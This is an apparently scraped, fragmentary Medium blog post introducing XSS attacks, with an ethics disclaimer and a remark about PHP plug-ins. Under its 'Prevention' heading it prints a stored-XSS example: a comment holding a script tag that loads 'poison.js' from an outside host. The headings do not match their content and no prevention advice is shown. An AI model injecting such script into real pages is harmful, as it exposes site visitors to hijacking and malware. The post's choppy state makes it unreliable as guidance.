How dangerous is XSS security?

Types of XSS

Previously, XSS often targeted HTML rendering code from the server-side, we called Server XSS. Two common types of XSS Server are Persistent XSS and Reflected XSS.

<div class = "comment">
<p> I want to find JA* </p>
</div>

Prevention

The principle of the series “Introduction security” is: Hack to learn, not learn to hack. My goal is not to teach you to hack and disrupt other sites but to teach you to know and prevent these attacks.

<div class = "comment">
<p><script src ="//po**hub.com/poison.js"</script></p>
</div>

Conclusion

Slightly subjective bit (because I do not like PHP), the number of sites built with PHP XSS error is the most. The first reason is that the number of websites written in PHP is very high. The second reason is that PHP does not encode strange characters by default. PHP CMSs like WordPress, Joomla are very powerful with loads of plug-ins. However, many negligent plug-ins are responsible for this security error.

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Beribey

Beribey

Always be nice to anybody who has access to my toothbrush.